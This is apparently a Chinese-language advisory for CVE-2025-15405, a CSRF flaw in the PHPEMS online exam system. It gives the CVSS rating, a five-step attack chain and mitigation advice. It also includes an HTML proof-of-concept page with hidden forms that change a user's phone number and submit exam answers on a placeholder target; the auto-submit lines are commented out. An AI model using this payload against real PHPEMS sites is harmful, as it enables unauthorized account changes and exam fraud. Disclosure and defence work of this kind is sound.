CVE-2025-15405: PHPEMS up to 11.0 跨站请求伪造(CSRF)漏洞

漏洞信息

漏洞编号

CVE-2025-15405

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

PHPEMS

漏洞概述

CVE-2025-15405是PHPEMS系统中发现的一个跨站请求伪造(Cross-Site Request Forgery, CSRF)安全漏洞。该漏洞存在于PHPEMS应用至11.0版本，攻击者可以利用此漏洞通过诱导已登录用户访问恶意页面，在用户不知情的情况下以该用户的身份执行非预期的操作。PHPEMS是一个基于PHP开发的在线考试系统，广泛应用于教育机构和企业培训场景。由于CSRF攻击利用的是用户已认证的身份，攻击者无需获取用户的凭证即可发起攻击，这使得该漏洞具有较高的隐蔽性和危害性。攻击者可以构造恶意链接或网页，当受害者在登录状态下访问这些内容时，浏览器会自动向目标网站发送携带用户会话Cookie的请求，从而触发预定义的恶意操作，如修改用户信息、提交考试答案或更改系统配置等。

技术细节

该CSRF漏洞源于PHPEMS应用在处理关键操作时缺少适当的CSRF令牌验证机制。攻击者可以通过以下方式利用此漏洞：1) 构造一个包含恶意表单的HTML页面，该表单指向PHPEMS的敏感操作端点；2) 使用JavaScript自动提交表单；3) 诱导已登录的PHPEMS用户访问该恶意页面。当用户访问时，浏览器会自动携带用户的认证Cookie向PHPEMS服务器发送POST请求。由于服务器仅验证用户是否已登录，而未验证请求是否来自合法的内部来源，恶意请求将被成功执行。攻击者可以利用此漏洞执行修改用户资料、提交考试答案、创建或删除数据等操作。该漏洞的CVSS向量为AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N，表明攻击复杂度低，无需认证，但需要用户交互才能成功发起攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标PHPEMS系统版本，确认版本在11.0或以下，并定位系统中缺少CSRF防护的敏感操作端点

STEP 2

步骤2: 构造恶意页面

攻击者创建包含恶意表单的HTML页面，表单指向PHPEMS的敏感操作(如用户信息修改、考试提交等)，并使用JavaScript实现自动提交

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、恶意链接或嵌入第三方网站的iframe等方式，诱导已登录的PHPEMS用户访问恶意页面

STEP 4

步骤4: 触发攻击

用户访问恶意页面后，浏览器自动携带用户的认证Cookie向PHPEMS服务器发送POST请求

STEP 5

步骤5: 请求执行

由于服务器仅验证用户登录状态而未验证CSRF令牌，恶意请求被成功执行，攻击者达到修改数据或执行未授权操作的目的

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-15405 -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC - CVE-2025-15405</title>
</head>
<body>
    <h1>PHPEMS CSRF Vulnerability PoC</h1>
    <p>This PoC demonstrates the CSRF vulnerability in PHPEMS up to 11.0</p>
    
    <!-- Example: Modify user profile -->
    <form id="csrfForm" action="http://target-site/phpems/index.php?user-phone-modify" method="POST" style="display:none;">
        <input type="hidden" name="token" value="attacker_controlled_or_empty">
        <input type="hidden" name="userphone" value="attacker_controlled_value">
        <input type="hidden" name="submit" value="1">
    </form>
    
    <!-- Example: Submit exam answer -->
    <form id="csrfExamForm" action="http://target-site/phpems/index.php?exam-dosubmit" method="POST" style="display:none;">
        <input type="hidden" name="token" value="">
        <input type="hidden" name="exercisesid" value="1">
        <input type="hidden" name="answer" value="attacker_answer">
        <input type="hidden" name="submit" value="1">
    </form>
    
    <script>
        // Auto-submit forms when page loads
        document.addEventListener('DOMContentLoaded', function() {
            // Uncomment to execute attack:
            // document.getElementById('csrfForm').submit();
            // document.getElementById('csrfExamForm').submit();
            console.log('CSRF PoC loaded - forms ready to submit');
        });
    </script>
</body>
</html>

影响范围

PHPEMS < 11.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 临时禁用非必要的敏感操作功能；2) 在Web应用防火墙(WAF)层面配置CSRF防护规则；3) 加强对用户的安全意识培训，提醒不要点击可疑链接；4) 监控异常请求模式，及时发现潜在的CSRF攻击行为；5) 考虑使用基于会话的双重提交Cookie机制作为临时防护方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15405
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15405
3 Details https://www.cvedetails.com/cve/CVE-2025-15405/
4 VulDB https://vuldb.com/cve/CVE-2025-15405
5 Link https://byebydoggy.github.io/post/2025/1231-phpems-csrf-poc/
6 Link https://vuldb.com/?ctiid.339325
7 Link https://vuldb.com/?id.339325
8 Link https://vuldb.com/?submit.728314